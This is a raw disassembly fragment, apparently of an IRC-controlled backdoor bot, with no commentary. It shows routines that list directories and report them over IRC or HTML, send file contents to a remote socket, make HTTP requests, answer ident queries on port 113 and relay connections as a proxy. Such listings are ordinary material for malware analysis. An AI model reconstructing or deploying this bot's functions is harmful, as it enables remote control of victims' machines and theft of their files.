call ds:dword_4CB6A4 ; send
cmp [ebp+arg_C], ebx
jz short loc_40FB64
push [ebp+arg_C]
call sub_41AFE0
cmp eax, 2
pop ecx
jbe short loc_40FB64
push [ebp+arg_C]
call sub_41AFE0
sub eax, 3
pop ecx
jz short loc_40FB15
loc_40FB09: ; CODE XREF: sub_40F96B+1A8�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_40FB15
dec eax
jnz short loc_40FB09
loc_40FB15: ; CODE XREF: sub_40F96B+19C�j
; sub_40F96B+1A5�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_41B5F0
add esp, 0Ch
lea eax, [ebp+var_594]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
loc_40FB64: ; CODE XREF: sub_40F96B+180�j
; sub_40F96B+18E�j
lea eax, [ebp+var_388]
push eax
push edi
call dword_427000 ; FindFirstFileA
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call dword_427118 ; FindNextFileA
test eax, eax
jz loc_40FF54
mov edi, 1FFh
loc_40FB90: ; CODE XREF: sub_40F96B+5E3�j
cmp [ebp+var_388], ebx
jz loc_40FF3C
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40FF3C
lea eax, [ebp+var_35C]
push offset a_ ; "."
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40FF3C
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call dword_427114 ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call dword_427110 ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_40FC05
mov ecx, offset aAm ; "AM"
loc_40FC05: ; CODE XREF: sub_40F96B+293�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_40FC11
sub eax, 0Ch
loc_40FC11: ; CODE XREF: sub_40F96B+2A1�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_41B886
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_40FDB4
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_40FC85
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
jmp loc_40FEFD
; ---------------------------------------------------------------------------
loc_40FC85: ; CODE XREF: sub_40F96B+2E0�j
cmp [ebp+arg_C], ebx
jz loc_40FD6F
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_1 ; "%s%s/"
push edi
push eax
call sub_41B980
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
lea eax, [ebp+var_35C]
push eax
call sub_41AFE0
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_40FD25
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_40FD2A
; ---------------------------------------------------------------------------
loc_40FD25: ; CODE XREF: sub_40F96B+3B1�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_40FD2A: ; CODE XREF: sub_40F96B+3B8�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_40FEFE
; ---------------------------------------------------------------------------
loc_40FD6F: ; CODE XREF: sub_40F96B+31D�j
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41B980
add esp, 14h
jmp loc_40FF0D
; ---------------------------------------------------------------------------
loc_40FDB4: ; CODE XREF: sub_40F96B+2D4�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_40FDF3
push ebx
push [ebp+var_368]
call sub_416923
pop ecx
pop ecx
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
push esi
loc_40FDDF: ; CODE XREF: sub_40F96B+577�j
lea eax, [ebp+var_248]
push eax
call sub_41B980
add esp, 1Ch
jmp loc_40FF0D
; ---------------------------------------------------------------------------
loc_40FDF3: ; CODE XREF: sub_40F96B+44F�j
cmp [ebp+arg_C], ebx
jz loc_40FEE7
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset dword_429AD0
push edi
push eax
call sub_41B980
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
lea eax, [ebp+var_35C]
push eax
call sub_41AFE0
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_40FE93
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_40FE98
; ---------------------------------------------------------------------------
loc_40FE93: ; CODE XREF: sub_40F96B+51F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_40FE98: ; CODE XREF: sub_40F96B+526�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_40FDDF
; ---------------------------------------------------------------------------
loc_40FEE7: ; CODE XREF: sub_40F96B+48B�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
loc_40FEFD: ; CODE XREF: sub_40F96B+315�j
push esi
loc_40FEFE: ; CODE XREF: sub_40F96B+3FF�j
lea eax, [ebp+var_248]
push eax
call sub_41B980
add esp, 18h
loc_40FF0D: ; CODE XREF: sub_40F96B+444�j
; sub_40F96B+483�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
cmp [ebp+arg_8], ebx
jz short loc_40FF3C
push 7D0h
call dword_427078 ; Sleep
loc_40FF3C: ; CODE XREF: sub_40F96B+22B�j
; sub_40F96B+246�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call dword_427118 ; FindNextFileA
test eax, eax
jnz loc_40FB90
loc_40FF54: ; CODE XREF: sub_40F96B+21A�j
push [ebp+arg_0]
call dword_42710C ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_40FF97
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_416923
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_416923
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_41B886
add esp, 14h
jmp short loc_40FFCB
; ---------------------------------------------------------------------------
loc_40FF97: ; CODE XREF: sub_40F96B+5F5�j
cmp [ebp+arg_C], ebx
jz short loc_40FFB1
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_41B886
pop ecx
pop ecx
jmp short loc_40FFCB
; ---------------------------------------------------------------------------
loc_40FFB1: ; CODE XREF: sub_40F96B+62F�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_41B886
add esp, 10h
loc_40FFCB: ; CODE XREF: sub_40F96B+62A�j
; sub_40F96B+644�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40F96B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FFF1 proc near ; CODE XREF: sub_40F531+13C�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call dword_4270EC ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4100A9
push esi
push ebx
call dword_427108 ; GetFileSize
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_4100A2
loc_410036: ; CODE XREF: sub_40FFF1+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_41B590
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_410053
mov edi, [ebp+arg_4]
loc_410053: ; CODE XREF: sub_40FFF1+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call dword_42711C ; SetFilePointer
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call dword_4270E8 ; ReadFile
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41009D
call ds:dword_4CB5E8 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4100A2
xor eax, eax
loc_41009D: ; CODE XREF: sub_40FFF1+9B�j
sub [ebp+arg_4], eax
jnz short loc_410036
loc_4100A2: ; CODE XREF: sub_40FFF1+43�j
; sub_40FFF1+A8�j
push ebx
call dword_427068 ; CloseHandle
loc_4100A9: ; CODE XREF: sub_40FFF1+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_40FFF1 endp
; =============== S U B R O U T I N E =======================================
sub_4100AE proc near ; CODE XREF: sub_40F6B4+181�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_41AFE0
test eax, eax
pop ecx
jbe short loc_4100D7
loc_4100C1: ; CODE XREF: sub_4100AE+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_4100CB
mov byte ptr [esi+edi], 2Fh
loc_4100CB: ; CODE XREF: sub_4100AE+17�j
push edi
inc esi
call sub_41AFE0
cmp esi, eax
pop ecx
jb short loc_4100C1
loc_4100D7: ; CODE XREF: sub_4100AE+11�j
mov eax, edi
pop edi
pop esi
retn
sub_4100AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100DC proc near ; CODE XREF: sub_401ACD+5298�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call ds:dword_4CB5C4 ; WSAStartup
push 6
push 1
push 2
call ds:dword_4CB6D4 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call ds:dword_4CB654 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40AAFA
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_4CB5FC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_4101B9
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_410155
mov eax, offset byte_43D808
loc_410155: ; CODE XREF: sub_4100DC+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_41B980
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call ds:dword_4CB6A4 ; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_41C310
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call ds:dword_4CB66C ; recv
pop esi
loc_4101B9: ; CODE XREF: sub_4100DC+6B�j
push ebx
call ds:dword_4CB6EC ; closesocket
call ds:dword_4CB5AC ; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_41B886
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_4101F9
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_4101F9: ; CODE XREF: sub_4100DC+102�j
pop edi
pop ebx
leave
retn
sub_4100DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4101FD proc near ; DATA XREF: sub_401221+445�o
; sub_401ACD+436A�o
var_238 = byte ptr -238h
var_38 = byte ptr -38h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_1C]
push esi
push eax
mov [ebp+var_8], esi
call sub_41B590
add esp, 0Ch
mov [ebp+var_1C], 2
push 71h
call ds:dword_4CB654 ; htons
push esi
push 1
push 2
mov [ebp+var_1A], ax
mov [ebp+var_18], esi
call ds:dword_4CB6D4 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_410361
mov eax, [ebp+arg_0]
push edi
imul eax, 234h
mov dword_43E59C[eax], ebx
lea eax, [ebp+var_1C]
push eax
push ebx
call ds:dword_4CB680 ; bind
cmp eax, 0FFFFFFFFh
jz loc_410361
push 5
push ebx
call ds:dword_4CB67C ; listen
cmp eax, 0FFFFFFFFh
jz loc_410361
mov [ebp+var_C], edi
mov edi, 200h
loc_410288: ; CODE XREF: sub_4101FD+EA�j
; sub_4101FD+14D�j ...
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
call ds:dword_4CB6E8 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_41035C
movzx eax, [ebp+var_2A]
push eax
push [ebp+var_28]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_238]
push offset dword_43468C
push eax
call sub_41B886
lea eax, [ebp+var_238]
push eax
call sub_4151AD
add esp, 14h
lea eax, [ebp+var_238]
push esi
push edi
push eax
push [ebp+var_4]
call ds:dword_4CB66C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_410288
lea eax, [ebp+var_238]
push esi
push eax
call sub_417F80
push 0Ch
lea eax, [ebp+var_38]
push esi
push eax
call sub_41B590
push esi
push esi
lea eax, [ebp+var_38]
push 2
push eax
call sub_40B08E
add esp, 24h
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp+var_238]
push edi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_238]
push esi
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_4]
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jz loc_410288
mov [ebp+var_8], 1
jmp loc_410288
; ---------------------------------------------------------------------------
loc_41035C: ; CODE XREF: sub_4101FD+A0�j
cmp [ebp+var_8], esi
jnz short loc_410388
loc_410361: ; CODE XREF: sub_4101FD+47�j
; sub_4101FD+6B�j ...
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_238]
push offset dword_434648
push eax
call sub_41B886
lea eax, [ebp+var_238]
push eax
call sub_4151AD
add esp, 10h
loc_410388: ; CODE XREF: sub_4101FD+162�j
push ebx
call ds:dword_4CB6EC ; closesocket
push [ebp+var_4]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
pop ebx
sub_4101FD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103AB proc near ; DATA XREF: sub_401ACD+613C�o
var_350 = byte ptr -350h
var_150 = byte ptr -150h
var_14C = dword ptr -14Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 350h
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_150]
push 10h
rep movsd
pop edi
mov dword ptr [eax+120h], 1
xor esi, esi
push edi
lea eax, [ebp+var_14]
push esi
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_44]
call ds:dword_4CB654 ; htons
push 6
push 1
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
mov [ebp+var_4], edi
call ds:dword_4CB6D4 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_410517
mov ecx, [ebp+var_40]
push 1
imul ecx, 234h
push 401h
push esi
push eax
mov dword_43E59C[ecx], eax
call ds:dword_4CB564 ; WSAAsyncSelect
lea eax, [ebp+var_14]
push edi
push eax
push [ebp+arg_0]
call ds:dword_4CB680 ; bind
test eax, eax
jnz loc_410517
push 0Ah
push [ebp+arg_0]
call ds:dword_4CB67C ; listen
test eax, eax
jnz loc_410517
loc_41045B: ; CODE XREF: sub_4103AB+C6�j
; sub_4103AB+147�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call ds:dword_4CB6E8 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41045B
movzx eax, [ebp+var_26]
push [ebp+var_40]
mov [ebp+var_14C], edi
mov [ebp+var_30], esi
push eax
push [ebp+var_24]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_350]
push offset unk_4346F4
push eax
call sub_41B886
push edi
lea eax, [ebp+var_350]
push 18h
push eax
call sub_40B0F7
mov [ebp+var_3C], eax
imul eax, 234h
mov ecx, [ebp+var_40]
add esp, 20h
mov dword_43E594[eax], ecx
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_150]
push esi
push eax
push offset sub_41053C
push esi
push esi
call dword_42707C ; CreateThread
mov ecx, [ebp+var_3C]
imul ecx, 234h
cmp eax, esi
mov dword_43E5A4[ecx], eax
jz short loc_410502
loc_4104EF: ; CODE XREF: sub_4103AB+155�j
cmp [ebp+var_30], esi
jnz loc_41045B
push 32h
call dword_427078 ; Sleep
jmp short loc_4104EF
; ---------------------------------------------------------------------------
loc_410502: ; CODE XREF: sub_4103AB+142�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_4346B8
call sub_415221
pop ecx
pop ecx
jmp short loc_41051A
; ---------------------------------------------------------------------------
loc_410517: ; CODE XREF: sub_4103AB+63�j
; sub_4103AB+97�j ...
mov edi, [ebp+arg_0]
loc_41051A: ; CODE XREF: sub_4103AB+16A�j
push edi
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_40]
call sub_40B413
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_4103AB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41053C proc near ; DATA XREF: sub_4103AB+124�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_41BB20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
mov ebx, [ebp+var_30]
push 1
pop ecx
mov [ebp+var_4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call ds:dword_4CB6D4 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_4106F2
push 10h
lea eax, [ebp+var_18]
push edi
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_18], 2
push [ebp+var_3C]
call ds:dword_4CB654 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call ds:dword_4CB694 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_4105CC
lea eax, [ebp+var_13C]
push eax
call ds:dword_4CB6D8 ; gethostbyname
jmp short loc_4105DA
; ---------------------------------------------------------------------------
loc_4105CC: ; CODE XREF: sub_41053C+7F�j
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_4CB60C ; gethostbyaddr
loc_4105DA: ; CODE XREF: sub_41053C+8E�j
cmp eax, edi
jz loc_4106F2
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_4CB5FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_4106F2
movzx eax, [ebp+var_16]
push [ebp+var_34]
mov [ebp+var_20], edi
push eax
push [ebp+var_14]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset unk_43477C
push eax
call sub_41B886
push esi
lea eax, [ebp+var_344]
push 18h
push eax
call sub_40B0F7
imul ebx, 234h
mov [ebp+var_30], eax
imul eax, 234h
mov ecx, [ebp+var_34]
lea esi, dword_43E59C[ebx]
mov dword_43E594[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_43E5A0[eax], ecx
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_144]
push edi
push eax
push offset sub_410723
push edi
push edi
call dword_42707C ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, edi
mov dword_43E5A4[ecx], eax
jz short loc_4106DF
loc_41068C: ; CODE XREF: sub_41053C+15D�j
cmp [ebp+var_20], edi
jnz short loc_41069B
push 32h
call dword_427078 ; Sleep
jmp short loc_41068C
; ---------------------------------------------------------------------------
loc_41069B: ; CODE XREF: sub_41053C+153�j
mov ebx, 1000h
loc_4106A0: ; CODE XREF: sub_41053C+19F�j
push ebx
lea eax, [ebp+var_1344]
push edi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_1344]
push edi
push ebx
push eax
push dword ptr [esi]
call ds:dword_4CB66C ; recv
cmp eax, edi
jle short loc_4106F2
push edi
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4106A0
jmp short loc_4106F2
; ---------------------------------------------------------------------------
loc_4106DF: ; CODE XREF: sub_41053C+14E�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_43473C
call sub_415221
pop ecx
pop ecx
loc_4106F2: ; CODE XREF: sub_41053C+44�j
; sub_41053C+A0�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_43E59C[eax]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_4]
call sub_40B413
pop ecx
push edi
call dword_4270CC ; ExitThread
pop edi
pop esi
pop ebx
sub_41053C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410723 proc near ; DATA XREF: sub_41053C+130�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_41BB20
mov eax, [ebp+arg_0]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_41075A: ; CODE XREF: sub_410723+7C�j
push edi
lea eax, [ebp+var_1128]
push 0
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_1128]
push 0
push edi
push eax
push dword_43E5A0[esi]
call ds:dword_4CB66C ; recv
test eax, eax
jle short loc_4107A1
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_43E59C[esi]
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41075A
loc_4107A1: ; CODE XREF: sub_410723+61�j
push dword_43E5A0[esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_14]
call sub_40B413
pop ecx
push 0
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_410723 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4107C0 proc near ; DATA XREF: sub_410A4E+1BE�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_43E59C[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call ds:dword_4CB63C ; select
test eax, eax
